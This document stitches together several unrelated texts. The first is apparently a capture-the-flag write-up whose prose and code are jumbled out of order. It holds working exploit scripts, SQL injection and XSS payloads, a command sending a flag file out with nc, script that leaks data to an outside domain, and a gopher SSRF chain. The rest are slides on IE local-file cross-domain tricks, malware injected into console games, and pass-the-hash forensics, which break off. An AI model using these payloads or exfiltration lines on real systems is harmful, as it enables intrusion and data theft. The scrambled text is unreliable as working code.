p.recvuntil('hahaha') p.sendline(str(addr2)) p.recvuntil(': ') # 0x000000000002155f : pop rdi ; ret payload = 'a'*0x108 + canary + 'b'*0x8 + p64(mem_addr) + 'c'*0x8 payload += p64(libc_base + 0x21560) # payload += p64(libc_base + 0x000000000002155f) + p64(libc_base + 0x1B3E9A) payload += p64(libc_base + 0x4F440) #gdb.attach(p) p.sendline(payload) p.interactive() if __name__ == '__main__': p = process('./hardcore_fmt') p = remote('', 9999) pwn(p) from pwn import * #p = process('./SOS', env = {'LD_PRELOAD': './libc-2.27.so'}) p = remote('', 9999) p.recvuntil('Give me the string size:') p.sendline('0') p.recvuntil('Alright, input your SOS code:') payload = '\x00' * 56 payload += p64(0x400c53) payload += p64(0x602020) payload += p64(0x4008E0) payload += p64(0x400AFC) #raw_input() p.send(payload + '\x00' * 8192) p.recvline() puts = p.recvline().strip() puts_addr = u64(puts.ljust(8, '\x00')) libc_addr = puts_addr - 0x809c0 print hex(puts_addr) print hex(libc_addr) system_addr = libc_addr + 0x4f440 binsh_addr = libc_addr + 0x1b3e9a mov_qword_ptr_rsi_rdi = libc_addr + 0x1401fd poprsi = libc_addr + 0x23e6a poprdi = libc_addr + 0x2155f poprdx = libc_addr + 0x01b96 open_addr = libc_addr + 0x10fc40 read_addr = 0x400900 write_addr = libc_addr + 0x110140 payload = '\x00' * 56 payload += p64(poprdi) payload += "flag\x00\x00\x00\x00" payload += p64(poprsi) payload += p64(0x602080) payload += p64(mov_qword_ptr_rsi_rdi) payload += p64(poprdi) payload += p64(0x602080) payload += p64(poprsi) payload += p64(0) payload += p64(open_addr) payload += p64(poprdi) payload += p64(3) payload += p64(poprsi) payload += p64(0x602080) payload += p64(poprdx) easywasm The WASM module is used to perform operation with the help of the outside layer. Reversing the module we could easily found a buffer overflow caused by strcpy . Since the module imports __emscripten_run_script , we could overwrite the function pointer (which is actually a table index) and run some javascript. payload += p64(100) payload += p64(read_addr) payload += p64(poprdi) payload += p64(1) payload += p64(poprsi) payload += p64(0x602080) payload += p64(write_addr) #raw_input() p.recvuntil('Alright, input your SOS code:') raw_input() p.send(payload + 'A' * 10000) #p.shutdown('write') p.interactive() #!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * import requests, sys, os, urllib, IPython s = requests.session() #URL = 'http://localhost:23333/' URL = '' def add_person(name, is_tutor=0): url = URL + 'add_person?' url += 'name=' + urllib.quote(name) url += '&is_tutor=' + urllib.quote(str(is_tutor)) print url resp = s.get(url) if 'person id =' not in resp.content: raise Exception("Failed allocation") index = int(resp.content[resp.content.index(' = ') + 3:]) return index def change_name(idx, name): url = URL + 'change_name?' Reverse easypt https://github.com/andikleen/simple-pt/blob/master/fastdecode.c 4007C7call0x52f0 url += 'id=' + urllib.quote(str(idx)) url += '&name=' + urllib.quote(name) resp = s.get(url) print resp.content return 'done' in resp.content def intro(idx): url = URL + 'intro?' url += 'id=' + urllib.quote(str(idx)) resp = s.get(url) return resp.content ''' struct person_t { i32 idx; i32 in_use; u8 name[60]; i32 func_idx; } ''' base = 4064 size = 72 idx = add_person('123', 0) print idx payload = 'this.a = require("child_process");//' print len(payload) assert len(payload) <= 60 payload = payload.ljust(60, ';') + p8(5) print change_name(idx, payload) print intro(idx) payload = 'a.execSync("cat flag | nc <redacted> 9999");//' assert len(payload) <= 60 print change_name(idx, payload) print intro(idx) print 'Done!' Web checkin url, 404 : Powered by beego 1.7.2 gitea/gogsCVE-2018-18925/6, go-macaron(https://github.com/go-macaron/session version<0.4.0) beego(https://github.com/astaxie/beego version<1.11.0) , sessionprovidersession cookie ./ , sessionbug. 0b, session, , , (, ) session, , gosessionid ../../../../../../go/src/github.com/checkin/website/static/img/avatar/xxxxxxx .png , Admin Panel , flag. f = open('ttt') d = f.read() f.close() import re s = r'tnt8 ([N,T]+)' dd = re.findall(s,d) res = '' for i in dd: res += i sss = r'((NT)+)TTT' de2 = re.findall(sss,res) de = '' for i in de2: t = len(i[0])/2 de += chr(t+0x20) print(de) # bctf{19c512c582879daf358404a9748cfdbb}!! UID int uit int64 # username string package main import ( SimpleVN 1. pug : "bytes" "encoding/gob" ) func EncodeGob(obj map[interface{}]interface{}) ([]byte, error) { for _, v := range obj { gob.Register(v) } buf := bytes.NewBuffer(nil) err := gob.NewEncoder(buf).Encode(obj) return buf.Bytes(), err } func DecodeGob(encoded []byte) (map[interface{}]interface{}, error) { buf := bytes.NewBuffer(encoded) dec := gob.NewDecoder(buf) var out map[interface{}]interface{} err := dec.Decode(&out) if err != nil { return nil, err } return out, nil } #{ } ssti require global : 2. url(puppeteer[chrome])headerurlheader const checkPUG = (upug) => { const fileterKeys = ['global', 'require'] return /^[a-zA-z0-9\.]*$/g.test(upug) && !fileterKeys.some(t => upug.toLowerCase().includes(t)) } ... console.log('Generator pug template') const uid = req.session.user.uid const body = `#{${upug}}` console.log('body', body) const upugPath = path.join('users', utils.md5(uid), `${uid}.pug`) console.log('upugPath', upugPath) try { fs.writeFileSync(path.resolve(config.VIEWS_PATH, upugPath), body) } catch (err) { ... : urlhosthost render file:// host /etc/passwd flag config.js const checkURL = (shooturl) => { const myURL = new URL(shooturl) return config.SERVER_HOST.includes(myURL.host) } file:// app.js flagpath http:// flag , FLAG_PATH FLAGFILENAME ssti this /local/render global FLAGFILENAME process.env.FLAGFILENAME FLAGFILENAME require FLAG_PATH config.js Web process.env.PWD html chrome view-source: html ... const FLAG_PATH = path.resolve(constant.ROOT_PATH, '********') ... const FLAGFILENAME = process.env.FLAGFILENAME || '********' ... .use(express.static(config.FLAG_PATH)) config.js flagflag: Range header request header 2000flag babySQLiSPA api/hints waf: gtid_subtracttable140 hint='or(gtid_subtract((select(group_concat(table_name))from(information_schema.tables) where((length(table_name)=ord('j')^ord('t')))),''))or' export function checkHint (hint) { return ! / |;|\+|-|\*|\/| <|>|~|!|\d|%|\x09|\x0a|\x0b|\x0c|\x0d|`|gtid_subset|hash|json|st\_|updatexm l|extractvalue|floor|rand|exp|json_keys|uuid_to_bin|bin_to_uuid|union|like| sleep|benchmark/ig.test(hint) } 30flag vhEFfFlLlLaAAaaggIiIIsSSHeReEE hint='||gtid_subtract((select(concat(column_name))from(information_schema.columns)w here(table_name='vhEFfFlLlLaAAaaggIiIIsSSHeReEE')),'')# flag {"error":"Malformed GTID set specification 'BCTF{060950FB-839E-4B57- B91D-51E78F56856F}'."} SEAFARING1 bot view-source:http://seafaring.xctf.org.cn:9999/admin/ api handle_message.php XSS botfirefox htmlbot xss,js <html> <script> window.onload =function(){ document.getElementById("f").submit(); } </script> <form method="post" action="http://seafaring.xctf.org.cn:9999/admin/handle_message.php" id="f"> <input name="token" value="<body><img src=x onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,1 00,121,46,97,112,112,101,110,100,67,104,105,108,100,40,100,111,99,117,109,1 01,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99 ,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,120, 56,122,46,116,111,112,47,120,98,53,77,63,97,61,98,39))></body>"> </form> </html> function req(url,data){ var xhr = new XMLHttpRequest(); xhr.open("POST",url,false); xhr.setRequestHeader("Content-Type","application/x-www-form- urlencoded"); xhr.send(data); var resp = xhr.responseText; return resp; } function getcsrf(){ var xhr = new XMLHttpRequest(); xhr.open("GET","http://seafaring.xctf.org.cn:9999/admin/index.php",false); xhr.send(); var res = xhr.responseText; var csrftoken = res.match(/csrf_token = \"([a-z0-9]*)\"/ig)[0].split('= "')[1].replace('"',''); return csrftoken; } function send(data){ location.href = "http://data.ebcece08.w1n.pw/?data="+escape(data); } bot sqlquery debug addslashes() (view_unreads) flag SEAFARING2 cookie: var ress = req("","token="+getcsrf()+"&action=view_unreads&stat us=3%20%20and%201%3D2%20union%20select%201%2Cload_file%280x2f70726f632f6e65 742f617270%29%2C3%2C4%20from%20f111111ag%23"); send(ress); {"result":"","error":"sql query error! debug info:SELECT timestamp,user_name,uid,is_checked,message FROM feedbacks where uid='1' ORDER BY id DESC "} {"result":"","error":"sql query error! debug info:SELECT timestamp,user_name,uid,is_checked,message FROM feedbacks where uid='1\\'or 1#' ORDER BY id DESC "} {"result":"","error":"sql query error! debug info:SELECT timestamp,user_name,uid,is_checked FROM feedbacks where is_checked=1\\' ORDER BY id DESC limit 0,50"} {"result":[["1","admin,f111111ag,feedbacks","3","4"]],"error":""} {"result":[["1","flllllag","3","4"]],"error":""} {"result":[["1","bctf{XsS_SQL1_7438x_2xfccmk}","3","4"]],"error":""} load_file ... /etc/hosts ip {"result":[["1","<?php \nfunction curl($url){\n $ch = curl_init();\n curl_setopt($ch, CURLOPT_URL, $url);\n curl_setopt($ch, CURLOPT_HEADER, 0);\n $re = curl_exec($ch);\n curl_close($ch);\n return $re;\n}\nif(!empty($_POST['You_cann0t_guu3s_1t_1s2xs'])){\n $url = $_POST['You_cann0t_guu3s_1t_1s2xs'];\n curl($url);\n}else{\n die(\"Hint: Just for web2! :)\");\n}\n?>","3","4"]],"error":""} <?php function curl($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); $re = curl_exec($ch); curl_close($ch); return $re; } if(!empty($_POST['You_cann0t_guu3s_1t_1s2xs'])){ $url = $_POST['You_cann0t_guu3s_1t_1s2xs']; curl($url); }else{ die("Hint: Just for web2! :)"); } ?> {"result":[["1","\tlocalhost\n::1\tlocalhost ip6-localhost ip6- loopback\nfe00::0\tip6-localnet\nff00::0\tip6-mcastprefix\nff02::1\tip6- allnodes\nff02::2\tip6- allrouters\n172.20.0.3\tb557ee5b8a02\n","3","4"]],"error":""} selenium server selenium server http://www.polaris-lab.com/index.php/archives/454/ file:// gopher console session /wd/hub/sesssions session api file:/// (base64) POST /wd/hub/session HTTP/1.1 Host: Content-Length: 49 Accept: application/json; charset=utf-8 Origin: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Referer: Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close {"desiredCapabilities":{"browserName":"firefox"}} POST /wd/hub/session/32621f2a19c3c4a4b51201e951831006/url HTTP/1.1 Host: Content-Length: 18 Accept: application/json; charset=utf-8 Origin: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Referer: Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close {"url":"file:///"} GET /wd/hub/session/1c602a62-cc09-4a1e-af5c-52b8715228ac/screenshot gopher:// post example: file:/// html You_cann0t_guu3s_1t_1s2xs=gopher:// b%252fsession%252f1c602a62-cc09-4a1e-af5c- 52b8715228ac%252furl%2520HTTP%252f1.1%250AHost%253A%2520127.0.0.1%253A4444% 250AContent- Length%253A%252038%250AAccept%253A%2520application%252fjson%253B%2520charse t%253Dutf- 8%250AOrigin%253A%2520http%253A%252f%252f127.0.0.1%253A4444%250AUser- Agent%253A%2520Mozilla%252f5.0%2520%2528Macintosh%253B%2520Intel%2520Mac%25 20OS%2520X%252010_13_6%2529%2520AppleWebKit%252f537.36%2520%2528KHTML%252C% 2520like%2520Gecko%2529%2520Chrome%252f70.0.3538.102%2520Safari%252f537.36% 250AContent-Type%253A%2520text%252fplain%253Bcharset%253DUTF- 8%250AReferer%253A%2520http%253A%252f%252f127.0.0.1%253A4444%252fwd%252fhub %252fstatic%252fresource%252fhub.html%250AAccept- Encoding%253A%2520gzip%252C%2520deflate%252C%2520br%250AAccept- Language%253A%2520zh- CN%252Czh%253Bq%253D0.9%252Cen%253Bq%253D0.8%250AConnection%253A%2520close% 250A%250A%257B%2522url%2522%253A%2522file%253A%252f%252f%252fTh3_MosT_S3cR3 T_fLag%2522%257D <img src="data:imgage/png;base64,"> flag Crypto guess_polynomial We can simply pass a very large x to the polynomial. #!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * VERBOSE = 1 if VERBOSE: context.log_level = 'debug' io = remote('', 9999) while 1: mynum = int('1'+'0'*50) io.sendlineafter('coeff','1'+'0'*50) io.recvuntil('sum:') num = int(io.recvuntil('\n').strip()) coeff = [] guess_number It's not hard to understand (as a newbie in cryptography and math like me) the algorithm with the help of this. Basically if we want to know we can have a vector which is close to , and is spanned by the lattice mentioned in the slides. This converts the HNP to a CVP over a specified lattice. We could then apply babai's nearest plane algorithm to solve it. while(num > mynum): coeff.append(str(num%mynum).strip('L')) num /= mynum io.recvuntil('coeff') coeff.append(str(num).strip('L')) io.sendline(' '.join(coeff[::-1])) import socket import ast import telnetlib #HOST, PORT = 'localhost', 9999 HOST, PORT = '', 9999 s = socket.socket() s.connect((HOST, PORT)) f = s.makefile('rw', 0) def recv_until(f, delim='\n'): buf = '' while not buf.endswith(delim): buf += f.read(1) return buf p = 1461501637330902918203684832716283019655932542983 k = 10 def solve_hnp(t, u): # http://www.isg.rhul.ac.uk/~sdg/igor-slides.pdf M = Matrix(RationalField(), 23, 23) for i in xrange(22): M[i, i] = p M[22, i] = t[i] M[22, 22] = 1 / (2 ** (k + 1)) def babai(A, w): ''' http://sage-support.narkive.com/HLuYldXC/closest-vector-from-a- lattice ''' BlockChain EOSGame For smallBlind and bigBlind , the expected reward is greater than our cost, so we just need to write a sciprt to call smallBlind and bigBlind multiple times. C = max(max(row) for row in A.rows()) B = matrix([list(row) + [0] for row in A.rows()] + [list(w) + [C]]) B = B.LLL(delta=0.9) return w - vector(B.rows()[-1][:-1]) closest = babai(M, vector(u + [0])) return (closest[-1] * (2 ** (k + 1))) % p for i in xrange(5): t = ast.literal_eval(f.readline().strip()) u = ast.literal_eval(f.readline().strip()) alpha = solve_hnp(t, u) recv_until(f, 'number: ') s.send(str(alpha) + '\n') t = telnetlib.Telnet() t.sock = s t.interact() def run(): myNonce = runweb3.eth.getTransactionCount( Web3.toChecksumAddress(main_account), "pending") print('nonce', myNonce) for i in range(400): transaction_dict = { 'from': Web3.toChecksumAddress(main_account), 'to': Web3.toChecksumAddress(constract), 'gasPrice': 10000000000, 'gas': 50000, 'nonce': None, 'value': 0, 'data': "0x70984e97" # "0xe2550156" } transaction_dict["nonce"] = myNonce + i r = runweb3.eth.account.signTransaction(transaction_dict, private_key) try: runweb3.eth.sendRawTransaction(r.rawTransaction.hex()) except Exception as e: print("error1", e) Fake3D The turingTest modifier is not bullet-proof, if the Fake3D contract is called during the constructor of another contract, then the turingTest can still be passed. We leveraged this to earn ourselves enough funds. (See the contract below.) Also there's some pitfalls inside the WinnerList contract. We cannot call CaptureTheFlag from arbitrary accounts since there's a hidden check which checks if the tx.origin ends with b143 inside that contract. So we managed to get one which fulfills the requirement and used it to get the flag. Attack contract: MISC IRC continue return print("Done", i) pragma solidity ^0.4.24; import "./Contract.sol"; contract Attack { using SafeMath for *; constructor () public { Fake3D f = Fake3D(0x4082cC8839242Ff5ee9c67f6D05C4e497f63361a); uint256 seed = uint256(keccak256(abi.encodePacked( (block.timestamp).add (block.difficulty).add ((uint256(keccak256(abi.encodePacked(block.coinbase)))) / (now)).add (block.gaslimit).add ((uint256(keccak256(abi.encodePacked(address(this))))) / (now)).add (block.number) ))); if((seed - ((seed / 1000) * 1000)) < 288) { for(int i = 0; i < 150; i++) { f.airDrop(); } } } } easysandbox Since the scf.so hooks __libc_start_main , we could simply build a static program which removes all the libc dependency and prevents the sandbox from being effective. // build with gcc -o exp -nostdlib solv.S #define __NR_exit 60 #define __NR_execve 59 .code64 .globl _start _start: lea path, %rdi lea args, %rsi xor %rdx, %rdx mov $__NR_execve, %rax syscall mov $__NR_exit, %rax syscall .data path: .asciz "/bin/sh" args: .long path .long 0
© 2013 NSFOCUS www.nsfocus.com nsfocus.com www.nsfocus.com nsfocus.com 瀏覽器和本地域 public 於暘 綠盟科技研究院 Who am I @tombkeeper on twitter Researcher @NSFOCUS Security Labs SCADA/ICS security research Focus on: APT/0-day attacks detection Vulnerability research Exploit technology Some other geek things 流覽器的域 域的意義:數據隔離 許可權隔離(尤其是 IE) 跨域漏洞:繞過域隔離 特殊的域:file:// IE對域的分類安全設置 主要內容 從網路域探測本地路徑 從網路域讀取本地檔 從本地域讀取本地檔 從網路域探測本地路徑 function probeImage( url ) function probeImage( url ) function probeImage( url ) function probeImage( url ) {{{{ var img = new Image(); var img = new Image(); var img = new Image(); var img = new Image(); img.onerror = function(){ img.onerror = function(){ img.onerror = function(){ img.onerror = function(){ alert( url + "exists"); alert( url + "exists"); alert( url + "exists"); alert( url + "exists"); }; }; }; }; img.onload = function(){ img.onload = function(){ img.onload = function(){ img.onload = function(){ alert( url + "do alert( url + "do alert( url + "do alert( url + "doeeees not exist"); s not exist"); s not exist"); s not exist"); } } } } img.src = url; img.src = url; img.src = url; img.src = url; }}}} 曾經對file://有效: 利用預設共用路徑繞過檢查 function probeImage( url ) function probeImage( url ) function probeImage( url ) function probeImage( url ) {{{{ var img = new Image(); var img = new Image(); var img = new Image(); var img = new Image(); img.onerror = function(){}; img.onerror = function(){}; img.onerror = function(){}; img.onerror = function(){}; img.onload = function(){alert( img.onload = function(){alert( img.onload = function(){alert( img.onload = function(){alert(‘‘‘‘hello pony hello pony hello pony hello pony');} ');} ');} ');} img.src = url; img.src = url; img.src = url; img.src = url; }}}} var qqid = " var qqid = " var qqid = " var qqid = "10001 10001 10001 10001"; "; "; "; var qqdatapath = "\\\\\\C$" + var qqdatapath = "\\\\\\C$" + var qqdatapath = "\\\\\\C$" + var qqdatapath = "\\\\\\C$" + "\\Program Files\\Tencent\\QQ2009\\Users\\"; "\\Program Files\\Tencent\\QQ2009\\Users\\"; "\\Program Files\\Tencent\\QQ2009\\Users\\"; "\\Program Files\\Tencent\\QQ2009\\Users\\"; probeImage(qqdatapath + qqid + "\\Image\\ probeImage(qqdatapath + qqid + "\\Image\\ probeImage(qqdatapath + qqid + "\\Image\\ probeImage(qqdatapath + qqid + "\\Image\\100 100 100 100"); "); "); "); IE + Windows XP有效 圖片物件 + onerror/onload: 從網路域探測本地路徑 DEMO 利用預設共用路徑繞過檢查 2013年5月2日美國勞工部網站被入侵後植入 的惡意程式碼中也使用了類似技巧來探測用 戶端是否安裝了某些殺毒軟體 利用的是腳本元素+異常處理 該方法至少對IE9 + Windows 7仍有效 判斷使用者是否使用了某軟體 ——避開安全軟體 判斷用戶是否是某些IM帳號的使用者 ——精確的漏洞攻擊 不依賴Cookie等手段的用戶追蹤 ——穿上馬甲照樣認識你 暴力枚舉或字典探測使用者IM帳號等 ——理論上可以…… 允許路徑探測的威脅 從網路域讀取本地檔 <Script Language="JavaScript" <Script Language="JavaScript" <Script Language="JavaScript" <Script Language="JavaScript" src=" src=" src=" src="file:///C:/Documents and file:///C:/Documents and file:///C:/Documents and file:///C:/Documents and Settings/Administrator/Cookies/administ Settings/Administrator/Cookies/administ Settings/Administrator/Cookies/administ Settings/Administrator/Cookies/administ rator@www.somehost[2].txt rator@www.somehost[2].txt rator@www.somehost[2].txt rator@www.somehost[2].txt"></Script> "></Script> "></Script> "></Script> <Script Language="JavaScript"> <Script Language="JavaScript"> <Script Language="JavaScript"> <Script Language="JavaScript"> alert(sessionid); alert(sessionid); alert(sessionid); alert(sessionid); </Script> </Script> </Script> </Script> 曾經可以直接將本地檔作為腳本源: 利用預設共用路徑繞過檢查 <Script Language="JavaScript" <Script Language="JavaScript" <Script Language="JavaScript" <Script Language="JavaScript" src=" src=" src=" src="\\\\\\C$\\Documents and \\\\\\C$\\Documents and \\\\\\C$\\Documents and \\\\\\C$\\Documents and Settings\\Administrator\\Cookies\\admin Settings\\Administrator\\Cookies\\admin Settings\\Administrator\\Cookies\\admin Settings\\Administrator\\Cookies\\admin istrator@www.somehost[2].txt istrator@www.somehost[2].txt istrator@www.somehost[2].txt istrator@www.somehost[2].txt"></Script> "></Script> "></Script> "></Script> <Script Language="JavaScript"> <Script Language="JavaScript"> <Script Language="JavaScript"> <Script Language="JavaScript"> alert(sessionid); alert(sessionid); alert(sessionid); alert(sessionid); </Script> </Script> </Script> </Script> 2011年8月MS11-057後,IE已經對Cookie檔案名隨機化 IE + Windows XP有效: 從網路域讀取本地檔 DEMO 能讀取什麼 任何能通過腳本語法檢查的文字檔 譬如某些軟體的設定檔 var x = "abcd"; var x = "abcd"; var x = "abcd"; var x = "abcd"; x = "abcd" x = "abcd" x = "abcd" x = "abcd" x = 123456 x = 123456 x = 123456 x = 123456 • 本地跨域漏洞到底有什麼用? – CVE-2002-0189 – CVE-2002-1187 – CVE-2002-1688 – CVE-2003-1328(MS03-004) – CVE-2005-0054(MS05-014) – CVE-2006-3643(MS06-044) – …… 從本地域讀取本地檔 通過iframe、window等對象, 域內腳本可以讀取任意同域檔內容 ——對本地域是否仍應如此? 從本地域讀取本地檔 DEMO • 敏感檔,無論什麼格式 – 檔內容如包含\0會截斷 – 理論上可以寫出一個“反彈”的HTML竊密木馬 • 某些包含模組位址資訊的日誌:對抗ASLR – Windows自身已經無任何含位址資訊的日誌 – 一些協力廠商應用程式仍然包含模組位址 • 建議:將檔案名或目錄隨機化 讀取本地檔內容的威脅 目前各流覽器的情況 遠程讀文件 遠端探測文件 本地讀檔 Firefox × × × Chrome × × × IE √ √ 用戶確認 Safari × × √ Opera × × √ ——所以,不要用Safari或Opera作為HTML 檔的預設關聯程式 謝謝!
MALWARE MIGRATING TO GAMING CONSOLES Embedded devices, an AntiVirus-free safe hideout for Malware Ahn Ki-Chan - Hanyang University, Undergraduate Ha Dong-Joo - AhnLab Inc., Security Researcher About Introduction - Embedded systems(gaming consoles, smartphones, etc.) have enough hardware for malware to survive and perform it's job - There are not so many publicly disclosed issues of malware on these devices which make people think that they are safe - The possibilities of malware on embedded systems and the resulting effects will be shown in this presentation with some real world examples, along with some possible defenses About Index Background Knowledge - The pirate scene of Gamine consoles and Smartphones - The current state of malware on embedded devices - The mindset of the general public The attacker's point of view - Gaming consoles as an attacking tool - Hacking with NDS - Malware on Console Gaming systems - Malware on Wii - Malware injection on Smartphone applications - Malware on Smartphones Preparation - Our defenses - Manufacturers : Steps to take when designing a new device - Service, Security companies : Measurements in Software or Policies - Users : Precautions for the general users About Background Knowledge The pirate scene of Gamine consoles and Smartphones Background Knowledge Payed software being illegally downloaded - Most embedded devices implement anti pirate Measures by some means, but these protections are eventually bypassed Background Knowledge - The pirate scene of Gamine consoles and Smartphones The distribution of illegal software - Just like PC software, illegal software is Being distributed without any restrictions via P2P, torrents, web storage - Easily accessible by the general public Background Knowledge - The pirate scene of Gamine consoles and Smartphones The current state of malware on embedded devices Background Knowledge Malware on Gaming Consoles - Disguises itself as a useful homebrew application, and lures users to install it - Disguises itself as an essential bypassing tool or crack, and upon installation, eventually causing havoc or wrecking the device Background Knowledge - The current state of malware on embedded devices Malware on Smartphones - Worm that targets jailbroken iphones using a default password - Traditional malware techniques incorporated in Windows Mobile and Blackberry - Social Engineering worm that collects phone information on Symbian Smartphones - Trojaned Windows Mobile Games - Toaster Rootkit - Android Rootkit Background Knowledge - The current state of malware on embedded devices The mindset of the general public Background Knowledge User’s thoughts of malware on embedded devices - Users not being suspicious just by the fact that that they're using ‘normal’ apps that don’t look 'fishy' - Most people do not even give a second thought before installing downloaded software, and merely just check that the application works Background Knowledge - The mindset of the general public However... - These devices are capable of bringing similar negative effects of PC malware, and the boundary of these devices and the PC is getting very thin due to the evolution of hardware - Most recent Gaming Consoles contain hardware to connect to the network, so an almost ideal environment if provided for malware to survive and perform it's task. Background Knowledge - The mindset of the general public The mindset of an attacker Gaming Consoles as an attacking Tool The attacker's point of view The hardware and software development environment - Most embedded devices contain a high quality CPU, I/O devices, and network devices - SDKs not officially provided by the manufacturer, but users can create legit software that runs on the device(via homebrew) with a custom development environment The attacker's point of view - Gaming console acting like a computer Hacking with NDS The attacker's point of view - Gaming console acting like a computer HOME AP NDS Desktop PC Notebook Smart phone Internet Attacker Web server Web server Hacking with NDS - Attacking and taking control of a PC - Demo : Using NDS to attack a PC on the network with a public remote exploit The attacker's point of view - Gaming console acting like a computer Hacking with NDS - Attacking the network - Demo : Using NDS to bring down a network The attacker's point of view - Gaming console acting like a computer Hacking with NDS - Injecting malicious code in network packets - Demo : Using NDS to inject malicious code by modifying packets The attacker's point of view - Gaming console acting like a computer Malware on Console Gaming systems The attacker's point of view Piracy in the gaming industry 2nd place among the current gaming console systems, closely following PSP The inner workings of games running on Wii - executables files are files with .dol extension - they are essentially a stripped down version of an elf file - system menu -> apploader -> .dol - .dol files(and sometimes .rel files) contain all code needed for the game to run The attacker's point of view - Malware injection on existing games How custom code can be injected - Merge 2 dol files - Update header information - Inject code that transfers execution to the game .dol after the execution of the injected .dol - Fix a few problematic parts in the binary The attacker's point of view - Malware injection on existing games How custom code can be injected - Demo : POC of malware injection on Nintendo Wii games The attacker's point of view - Malware injection on existing games Malware on Wii The attacker's point of view - Malware injection on existing games HOME AP Wii Desktop PC Notebook Smart phone Internet Attacker Web server Web server Malware on Wii - Demo : Malware(attack remote host) in live action while the game is playing The attacker's point of view - Malware injection on existing games - Modifying the game files and injecting custom code - Demo : Malware(network down) in live action while the game is playing Malware on Wii - Demo : Malware(network down) in live action while the game is playing The attacker's point of view - Malware injection on existing games - Modifying the game files and injecting custom code - Demo : Malware(network down) in live action while the game is playing Malware on Wii - Demo : Malware(attack ap & dns pharming) in live action while the game is playing The attacker's point of view - Malware injection on existing games - Modifying the game files and injecting custom code - Demo : Malware(network down) in live action while the game is playing Malware injection on Smartphone applications The attacker's point of view Malware on iPhone - Executables are Mach-O binaries - Lots of malware papers on MAC viruses are public The attacker's point of view - Malware injected into Smartphone applications Malware(attack remote host) in live action while the game is playing Malware on Android The attacker's point of view - Malware injected into Smartphone applications - Modifying the game files and injecting custom code - Demo : Malware(network down) in live action while the game is playing How to Defend Defenses - Manufacturers : Steps to take when designing a new device - Security Companies : Measurements in Software or Policies - Users : Precautions for the general users Preparation - Our defenses Conclusion Conclusion - There are no doubts that malware can run on embedded devices, and there may already be some running in the wild - These malware can be equally strong as those on PC, so one must be fully aware of their potential - Not only Gaming Consoles of Smartphones, but any other future embedded device may become a target, so users should be careful and be prepared Preparation - Our defenses Download Games at your own risk! References - Google http://google.com/ - WiiBrew http://wiibrew.org/wiki/Main_Page - GBATemp http://gbatemp.net - devkitPro.org http://www.devkitpro.org/ - kkamagui 프 로 그 래 밍 세 상 http://kkamagui.tistory.com/ - POC http://www.powerofcommunity.net/ Preparation - Our defenses
FORENSIC ARTIFACTS FROM A PASS THE HASH (PTH) ATTACK BY: GERARD LAYGUI DISCLAIMER: THE VIEWS AND OPINIONS EXPRESSED IN THIS PRESENTATION ARE THOSE OF THE AUTHOR’S AND DOES NOT NECESSARILY REPRESENT THE OFFICIAL POLICY OR POSITION OF THE COMPANY THAT THE AUTHOR WORKS FOR. WHAT IS A HASH? A HASH FUNCTION IS ANY FUNCTION THAT CAN BE USED TO MAP DIGITAL DATA OF ARBITRARY SIZE TO DIGITAL DATA OF FIXED SIZE. IN THE CASE OF WINDOWS, A PASSWORD IS STORED IN EITHER A LANMAN (LM) HASH OR NT LAN MANAGER (NTLM) HASH FORMAT. WHERE ARE HASHES STORED? • The Security Accounts Manager (SAM) database. • Local Security Authority Subsystem (LSASS) process memory. • Domain Active Directory Database (domain controllers only). • The Credential Manager (CredMan) store. • LSA Secrets in the registry. HASH EXAMPLES • Plaintext = password • LM Hash E52CAC67419A9A224A3B108F3FA6CB6D • NTLM Hash 8846F7EAEE8FB117AD06BDD830B7586C PASS THE HASH (PTH) “Pass the hash is a hacking technique that allows an attacker to authenticate to a remote server/service by using the underlying NTLM and/or LanMan hash of a user's password, instead of requiring the associated plaintext password.” In this case, hash == password DEMO ENVIRONMENT - LOGGING CHANGES • Audit logon events - Success & Failure • Audit account management - Success & Failure • Audit account logon events - Success & Failure • Audit process tracking - Success & Failure • Audit system events - Success & Failure • Increase log file sizes Microsoft Audit Policy Recommendations - https://technet.microsoft.com/en-us/library/dn487457.aspx DEMO DOMAIN Client Windows 7 Client 2 Member Server W2K8 R2 Member Server 2 W2K12 Domain Controller ImaUser ImaDomainAdmin S-1-5- 21domain- 500 S-1-5- 21domain- 500 Windows 2012 Native Mode Domain Name: OHNOES.INTERNAL PASS THE HASH ATTACK SEQUENCE Compromise Elevate Privilege Scrape Hashes Recon Leave Backdoor (Optional) Crack Hashes (Optional) Pass The Hash Pass The Hash Recon Scrape Hashes Elevate Privilege Extract Active Directory DEMO PASS THE HASH FORENSIC EVIDENCE • Volatile • At Least - Network (pcap, routes, netstat), Process List • Best - RAM Memory Captures, hiberfil.sys • VMWare - Suspend VM, use vmem file • Non-Volatile • At Least - Event Logs, Registry, Systeminfo • Best - Disk Images • VMWare - Use VMDK ANALYSIS TOOLS - VOLATILE • Dump Memory • HBGary - FDPro • Mandiant Memoryze • Analyze Memory • Volatility (Free) • HBGary Responder Pro ANALYSIS TOOLS – NON-VOLATILE • Creating Disk Images • Linux dd • Encase • FTK • Analyze Disk Images • The Sleuth Kit / Autopsy • Log2Timeline • Encase • FTK COMPROMISE • Windows Security Event Log (Process Audit Success) • Security Event ID 4688 Process Creation COMPROMISE • Prefetch – Disk Artifact (Note: No artifacts if using a SSD or if using Windows Server OS) • Time stamps reveal when a program was launched COMPROMISE • Shim Cache • Registry – regripper • Memory – volatility (shimcache switch) COMPROMISE • Memory - Volatility • Malfind command BACKDOOR • Windows Security Event Log - Persistence • Security Event ID 4720 - User account created • Security Event ID 4732 – User added to groups BACKDOOR • Registry (Regripper) • 